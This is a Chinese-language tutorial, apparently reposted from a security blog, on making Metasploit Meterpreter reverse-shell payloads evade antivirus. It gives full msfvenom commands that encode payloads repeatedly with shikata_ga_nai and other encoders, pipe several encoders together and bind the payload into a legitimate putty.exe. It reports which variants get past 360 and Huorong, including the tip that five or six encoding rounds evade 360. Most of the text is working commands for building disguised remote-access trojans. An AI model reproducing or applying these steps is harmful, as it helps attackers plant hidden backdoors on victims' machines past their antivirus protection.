0x01 免殺能力一覽表

• 上面表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了Bypass。
• 為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
• 由于本機測試時只是安裝了360全家桶和火絨，所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2019.12.12)，火絨版本5.0.33.13(2019.12.12)，360安全衛士12.0.0.2001(2019.12.17)。
• 其他殺軟的檢測指標是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態查殺能力，數據僅供參考，不足以作為免殺的精確判斷指標。

0x02 前言

本節主要是對msf自身提供的免殺機制（編碼+捆綁）進行嘗試，由于msf被各大安全廠商盯的比較緊，所以這些常規的方法免殺效果肯定是比較差的，但有時把一兩種常規方法稍微結合一下就能達到比較好的免殺效果

0x03 未處理的payload

在做免殺之前，我們先生成一個原始payload作為原始參數對比，這里我們就選使用頻率最高的windows/meterperter/reverse_tcp，這也是被各大殺軟盯的最緊的一個。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe -o payload1.exe

基本不用懷疑，本地的360全家桶和火絨都能查殺。

0x04 msf自編碼處理

使用msfvenom --list encoders可查看所有編碼器

評級最高的兩個encoder為cmd/powershell_base64和x86/shikata_ga_nai，其中x86/shikata_ga_nai也是免殺中使用頻率最高的一個編碼器了。

使用x86/shikata_ga_nai生成payload，參數-i為編碼次數，我這里設置15次，并使用了-b參數去掉payload中的空字符。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 15 -f exe -o payload2.exe

測試機器運行，本地的360全家桶和火絨都能查殺。

由于shikata_ga_nai編碼技術是多態的，也就是說每次生成的payload文件都不一樣，有時生成的文件會被查殺，有時卻不會。當然這個也和編碼次數有一定關系，編碼次數好像超過70次就經常生成出錯，但是編碼次數多并不代表免殺能力強。

0x05 msf自捆綁免殺

在生成payload時可以使用捆綁功能，使用msfvenom的-x參數可以指定一個自定義的可執行文件作為模板,并將payload嵌入其中，-x后面跟對應文件路徑就可以。
我這里使用一個正規的putty.exe作為被捆綁測試軟件。
生成payload命令如下：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -x putty.exe -f exe -o payload3.exe

生成的兩個文件對比，大小完全一樣。

測試機器運行，本地的360全家桶和火絨都能查殺該payload。

0x06 msf自捆綁+編碼

將上面的編碼和捆綁兩種方法結合一下進行嘗試

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -x putty.exe -i 15 -f exe -o payload4.exe

測試機器執行，發現火絨動態靜態均能查殺，而360不會報病毒。

在關閉火絨后，開啟360安全衛士和殺毒的情況下，可上線，可免殺。

可修改-i編碼次數，編碼次數越多，生成的payload越可能免殺，經測試，編碼5次和6次可免殺360。

0x07 msfvenom 多重編碼

msfvenom的encoder編碼器可以對payload進行一定程度免殺，同時還可以使用msfvenom多重編碼功能，通過管道，讓msfvenom用不同編碼器反復編碼進行混淆。
如下命令，使用管道讓msfvenom對攻擊載荷多重編碼，先用shikata_ga_nai編碼20次，接著來10次的alpha_upper編碼，再來10次的countdown編碼，最后才生成以putty.exe為模板的可執行文件。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

還有這種更多重編碼姿勢

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.74.133 LPORT=5110 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > payload6.exe

virustotal.com上查殺率為45/70，編碼多了，免殺率居然降低了。。。尷尬。。
經過測試，發現使用的編碼類型越多，免殺率可能會降低，猜測是因為各種編碼引入了更多的特征碼。同時生成的payload也很可能無法正常執行，這個也和被捆綁程序有一定關聯

0x08 參考資料

使用msf編碼器避開殺毒軟件的檢測：https://www.freebuf.com/column/216599.html

msf多重編碼:https://blog.csdn.net/wyf12138/article/details/79825833

Msfvenom學習總結:http://www.secist.com/archives/3353.html

msfvenom生成后門的免殺測試：http://www.naivete.online/msfvenom%E7%94%9F%E6%88%90%E5%90%8E%E9%97%A8%E7%9A%84%E5%85%8D%E6%9D%80%E6%B5%8B%E8%AF%95/

總結

以上是生活随笔為你收集整理的远控免杀专题3---msf自免杀的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。